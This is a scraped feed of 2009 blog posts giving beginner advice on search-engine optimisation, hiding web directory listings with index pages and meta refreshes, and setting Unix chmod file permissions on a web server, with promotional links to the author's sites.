Your most important page and keywords should be on the first page of a website.<br /><br />I have found some websites that have on-line tools to help you create meta tags and to check your overall index page to see how "Spider" friendly it is. Search engines are like spiders that crawl the internet.<br /><br />To help in creating Meta tags I have used the following:<br /><a href="http://www.submitcorner.com/Guide/Meta/">http://www.submitcorner.com/Guide/Meta/</a><br /><br />To see how spider friendly my Meta tags are, I use the following tools:<br /><a href="http://websitesubmit.hypermart.net/metataganalysis.htm">http://websitesubmit.hypermart.net/metataganalysis.htm</a><br /><a href="http://www.submitexpress.com/analyzer/">http://www.submitexpress.com/analyzer/</a><br /><a href="http://www.seocentro.com/tools/search-engines/metatag-analyzer.html">http://www.seocentro.com/tools/search-engines/metatag-analyzer.html</a><br /><br />When you use these tools to check your website, you must also use your own logic. Suggestions are given but it must be up to you if and when you use them. Use them primarily as a guide as they have indeed helped my websites.<br /><br /><strong>5. Monitoring Your Site</strong><br /><br />Once you have submitted your site to a search engine be sure you find out from the FAQ's listed (sometimes) on that particular Search engines site, as to how it works.<br />For example:<br />Some search engines will automatically drop your listing after a preset time. Others won't.<br />Some search engines will penalize (even permanently 'ban' your site) if you re-submit it too often.<br /><br />Bottom Line - make sure you find out these things about the search engine you are submitting to and then comply with their rules.<br /><br />To check your Website ranking for a particular keyword go to the search engine whose position you want to check, and enter your keyword. You then need to go through the results and try to locate your Website URL in the results.<br /><br />This manual method of checking your website's position/search engine ranking is both time consuming and tedious. It is however the most reliable and search engine friendly.<br /><br />You can, however, also use some tools to find your page ranking until you arrive at the rank you want. You can then use the manual method.<br /><br />I have found the following tools very helpful:<br /><a href="http://www.mikes-marketing-tools.com/ranking-reports/">http://www.mikes-marketing-tools.com/ranking-reports/</a><br /><a href="http://www.seochat.com/seo-tools/pagerank-search/">http://www.seochat.com/seo-tools/pagerank-search/</a><br /><br />Quite often, when people are creating their website, they tend to forget about adding website protection and security. It is critical that one adds homepage protection and security, as well as, individual web page protection and security. If information security is not implemented in your website design strategy, one can get leeching and hot linking of important digital files and images, as well as, illegal downloading of your digital products. It is vital that you add website protection in order to have universal protection security.<br /><br />For help on adding website security, you can visit:<br /><br /><a href="http://www.websiteprotection.net/">http://www.websiteprotection.net/</a><br /><br />If you are disillusioned or struggling with your current internet marketing campaign, you can get help by visiting:<br /><br /><a href="http://www.nichemarketingsecrets.net/">http://www.nichemarketingsecrets.net/</a><br /><br />If you want a one-stop solution center with plenty of important and helpful information you can visit:<br /><br /><a href="http://www.schembrionics.com/">http://www.schembrionics.com</a>Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-9543488179824315122009-10-09T12:41:00.000-07:002009-10-09T13:01:56.061-07:00Website Protection Using The Index PageAll web servers are configured to display a default page for a directory if a default file exists. That is how your home page is found when someone simply enters a domain name for the URL for a web site and the home page is displayed. A server is configured to search a list of default file names and if it finds a match, it displays the page. The default files could be similar to what is shown below.<br /><br />index.htm<br />index.html<br />index.shtml<br />index.php<br /><br />When someone goes to your site by typing in your URL, the index page is what they normally see first. This prevents viewing other pages or files you may have in the root directory. What your visitor actually sees in this case is your home page.<br /><br />The other directories(sub-folders) on your website, the ones below your root directory, which is typically called "public", or "public_html", do not normally have this index page. If the index page is not there, your visitor may be able to view every web page or file you have in that directory. A folder without an index page is open and everyone can find your product if they search for it. You thus should create an index page for all your folders.<br /><br />You can verify whether or not your site is configured to prevent directory listing. You can test this by entering your URL domain name and a directory name for any directory that exists in your site in your web browser (e.g. <a href="http://www.yourdomain_name/temp">http://www.yourdomain_name/temp</a>). Doing this should generate a browser error page or list the contents of the directory.<br /><br />If we assume you have a subdirectory named temp as given by the previous example, you will see the following if directory listing is not prevented.<br /><br />Index of / temp<br />Name--------------------Last Modified----------Size<br />Parent Directory--------30-Apr-2009 11:09--- -<br />document1.txt-----------29-Apr-2009 10:03--- 20k<br />document2.pdf-----------28-Apr-2009 06:10--- 1831k<br />document3.doc-----------27-Apr-2009 09:10--- 568k<br /><br />The above example shows the complete directory listing of the folder called temp. All someone has to do is to click on the file to open and possibly modify it. They can also download any of the files in the directory. If you happen to be in this situation, you need to add some website protection to your sub-folders.<br /><br />We see then that if no index page exists on a server configured to prevent listings, an error is normally generated. But when a server is configured to allow a directory listing, the directory index is displayed rather than generating an error.<br /><br />The index page can be used in any directory on a web site except those directories that already utilize an index page or default page. This includes the root directory. Never place one of these files in the root directory, never overwrite an index page or default page that already exists and never place an index page in a directory where another index page or default page already exists.<br /><br />The subfolders index page does not have to be anything special. It can be a very simple HTML page as you are only using it to close the door on your folders. The following shows a simple index page you can use.<br />----------------------------------------------------------------------------------------------<br />!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"<a href="http://www.w3.org/TR/html4/loose.dtd">http://www.w3.org/TR/html4/loose.dtd</a><br />html<br />head<br />/head<br />body<br />/body<br />/html<br />-----------------------------------------------------------------------------------------------<br />The above would show a blank web page. Instead of seeing all the files that you have in sub-folder temp, they would simply see a blank web page.<br /><br />If you want, you can put some text or graphics between *body* and */body*.<br />You can add some text that perhaps says: "Internal server error. Please contact system administrator."<br /><br />The text will give the impression that the person trying to get into your site, caused some type of server error and so will hopefully stop them from going any further. The modified index page is shown below.<br /><br />------------------------------------------------------------------------------------------------<br />!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"<a href="http://www.w3.org/TR/html4/loose.dtd">http://www.w3.org/TR/html4/loose.dtd</a><br />html<br />head<br />/head<br />body<br />h1Server Error/h1<br />Internal server error. Please contact system administrator.<br />/body<br />/html<br />------------------------------------------------------------------------------------------------<br />You can also take the index web page one step further. You can redirect spying eyes from your website directories back to your home index page in your root directory. You can use what is called a "meta refresh" tag. The tag looks like the following:<br /><br />META HTTP-EQUIV="refresh" content="0;URL=http://www.yourdomain_name"<br /><br />You would replace "yourdomain_name" with your actual domain name or whatever URL you would like to put there.<br /><br />The following shows the index page with the meta refresh tag:<br />------------------------------------------------------------------------------------------------<br />!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"<a href="http://www.w3.org/TR/html4/loose.dtd">http://www.w3.org/TR/html4/loose.dtd</a><br />html<br />head<br />META HTTP-EQUIV="refresh" content="0;URL=http://www.yourdomain_name"<br />/head<br />body<br />/body<br />/html<br /><br />If you are using an index page with the meta-refresh tag only, then instead of someone seeing a blank web page, they actually get re-directed to your Home page. If this was a casual surfer who just happened to end up at your website by mistake, then they will find themselves on your Home front page, and, you might end up getting a customer, a good side benefit of the index.html page with meta-refresh tag.<br /><br />To learn more about Website Protection and Security, please visit:<br /><br /><a href="http://www.websiteprotection.net/">http://www.websiteprotection.net/</a><br /><br />It is important to remember that when you create an index page, it is important to use a pure text editor such as Notepad or an editor designed to create web pages. Never use Word or a word processor to create web pages. The files that word processors create contain formatting codes and other invisible information that can create problems with web servers. Also, when you save the index page, ensure that it has the proper file extension, e.g., index.htmlJoseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0tag:blogger.com,1999:blog-2868164930975704250.post-42896449187556612692009-10-09T11:37:00.000-07:002009-10-09T12:35:11.343-07:00Website Protection and Security Using File and Directory CHMODA variety of files and directories in your website need to be given the correct permissions to work properly. Giving permissions to files or directories in the Unix world is called CHMOD (change mode). Chmod is a Unix command that lets permission levels be assigned to each file or directory. The proper CHMOD is also needed to help you with your website protection and security. As you will see later in this document, you can use your FTP client to change the file permissions in order to protect your files.<br /><br />Every file or folder in UNIX has access permissions. There are three types of permissions (what allowed to do with a file):<br /><br />1) read access<br />2) write access<br />3) execute access<br /><br />These specific permissions apply as follows:<br /><br /><strong>Read</strong><br />The read permission, which grants the ability to read a file. When set for a directory, this permission grants the ability to read the names of files in the directory (but not to find out any further information about them, including file type, size, ownership, permissions, etc.)<br /><br /><strong>Write</strong><br />The write permission, which grants the ability to modify a file. When set for a directory, this permission grants the ability to modify entries in the directory. This includes creating files, deleting files, and renaming files.<br /><br /><strong>Execute</strong><br />The execute permission, which grants the ability to execute a file. This permission must be set for executable binaries (for example, a compiled c++ program) or shell scripts (for example, a Perl program) in order to allow the operating system to run them. When set for a directory, this permission grants the ability to traverse its tree in order to access files or subdirectories, but not see files inside the directory (unless read is set )<br /><br />When a permission is not set, the rights it would grant are denied. Files created within a directory will not necessarily have the same permissions as that directory.<br /><br />Access permissions for files and folders mean different things from the user standpoint. Below shows the difference<br /><br /><strong>Read Access For File:</strong><br />On a regular file, the read permission bit means the file can be opened and read<br /><strong>Read Access For Directory:</strong><br />On a directory, the read permission means you can list the contents of the directory.<br /><br /><strong>Write Access For File:</strong><br />On a regular file, this means you can modify the file, aka, write new data to the file, change its contents<br /><strong>Write Access For Directory:</strong><br />In the case of a directory, the write permission means you can add, remove, and rename files in the directory. This means that if a file has the write permission bit, you are allowed to modify the file's contents, but you're allowed to rename or delete the file only if the permissions of the file's directory allow you to do so<br /><br /><strong>Execute Access For File:</strong><br />In the case of a regular file, this means you can execute the file as a program or a shell script<br /><strong>Execute Access For Directory:</strong><br />On a directory, the execute permission (also called the "search bit") allows you to access files in the directory and enter it, with the cd command, for example. However, note that although the execute bit lets you enter the directory, you're not allowed to list its contents, unless you also have the read permissions to that directory<br /><br />Every file on your Linux system, including directories, is owned by a specific user and group. Therefore, file permissions are defined separately for users, groups, and others.<br /><br />Permissions are defined for three types of users:<br />1) the owner of the file<br />2) the group that the owner belongs to<br />3) other users<br /><br /><strong>User Type - USER(u):</strong><br />The username of the person who owns the file. By default, the user who creates the file will become its owner.<br /><strong>User Type - GROUP(g):</strong><br />The usergroup that owns the file. All users who belong into the group that owns the file will have the same access permissions to the file. This is useful if, for example, you have a project that requires a bunch of different users to be able to access certain files, while others can't. In that case, you'll add all the users into the same group, make sure the required files are owned by that group, and set the file's group permissions accordingly.<br /><strong>User Type - OTHER(o):</strong><br />A user who isn't the owner of the file and doesn't belong in the same group the file does. In other words, if you set a permission for the "other" category, it will affect everyone else by default. For this reason, people often talk about setting the "world" permission bit when they mean setting the permissions for "other."<br /><br />The mode number consists of three octal digits, n1n2n3, representing the access allowed for yourself, for your group (other users set-up on your account), and for everyone else. The value of each digit represents the type of access that is allowed.<br /><br />Each digit in the mode parameter represents the permissions for a user or a class of users. The first digit corresponds to the owner of the file. The second digit corresponds to the file's group. The final digit corresponds to everybody else.<br /><br />We can also say that the first digit, n1, on the left, stands for the owner of the file or directory. The middle digit, n2, represents the group who owns the file or directory. The last digit, n3, represents the rest of the world.<br /><br />Octal---Digit---Permission<br />000------ 0 --- no permissions enabled<br />001------ 1 --- execute permission enabled<br />010------ 2 --- write permission enabled<br />011------ 3 --- write and execute are both enabled<br />100------ 4 --- read persmission enabled<br />101------ 5 --- read and execute are both enabled<br />110------ 6 --- read and write are both enabled<br />111------ 7 --- read, write and execute are all enabled<br /><br />We see from above table that:<br /><br />1) read is given a value of 4<br />2) write is given a value of 2<br />3) execute is given a value of 1<br /><br />This then is translated by adding the values together for each of the groups of permissions.<br /><br />For example, let us say the CHMOD is n1n2n3 = 755 = user/group/other; what does this mean:<br /><br />i) user can read (4), write (2) and execute (1) : 4 + 2 + 1 = 7<br />ii) group can read (4) and execute (1) : 4 + 0 + 1 = 5<br />iii) others can read (4) and execute (1) : 4 + 0 + 1 = 5<br /><br />If the group had the same permissions as the user then we would have 775.<br /><br />Instead of numbers for the mode, we could also have letters as follows:<br /><br />1) read = r (4)<br />2) write = w (2)<br />3) execute = x (1)<br />4) not enabled = - (0)<br /><br />We can then make 755 = rwx r-x r-x<br />where:<br />user = rwx<br />group = r-x<br />other = r-x<br /><br />If we had 765 then this would be the same as rwx rw- r-x<br /><br />You can also see users defined by letters as follows:<br /><br />1) user = u<br />2) group = g<br />3) others = o<br />4) everybody = a<br /><br />Usually, only the file owner can change permissions.<br /><br />Although a shell prompt in a Unix-like environment can be used to do this, an FTP client is often used for such task. Depending on the FTP client being used, CHMOD is usually available through menus or by simply clicking the right mouse button when hovering over a file or directory and choosing the chmod/property option. To set the permissions check the properties or enter the corresponding chmod numbers in the dialogue box.<br /><br />For more information your can visit the following:<br /><br /><a href="http://www.websiteprotection.net/">http://www.websiteprotection.net</a><br /><br />On a web server, files are usually set to 644. This indicates that the file owner can read and write to the file, while everyone else can only read it. Directories are commonly set to 755. This indicates that the directory owner has full control, while everyone else can read and execute the files within it.<br /><br />Most common file permissions:<br /><br />Files: 644<br />Folders: 755 (with index page in it)<br />Images: 644<br />CGI scripts: 755<br />Php scripts: 644<br /><br />By default, your public_html ( or public) directory should be rwxr-xr-x (755).<br />With this setting, if a Web surfer connects to your domain, the server will display either your home page (if a file with the name index.html, index.htm, or index.shtml exists) or a listing of all the files in that directory.<br /><br />Your other option for your public_html (or public) directory is rwx--x--x (711).<br />This permission setting will not show a file listing.<br />If there is no home page, the Web surfer will receive a "Forbidden" error message.<br /><br />You should take care in setting files CHMOD 777. This basically means anyone can read/write/execute/search the file/directory. In this situation you are leaving your web pages open to the world and making it easy for people to hack your website.<br /><br />As a owner you need to read, write and execute the files.<br />As a group certain web server applications or people need to read and execute your files.<br />As ‘others’, the whole world needs to read and execute your files.Joseph Schembrihttp://www.blogger.com/profile/17033607884007130899noreply@blogger.com0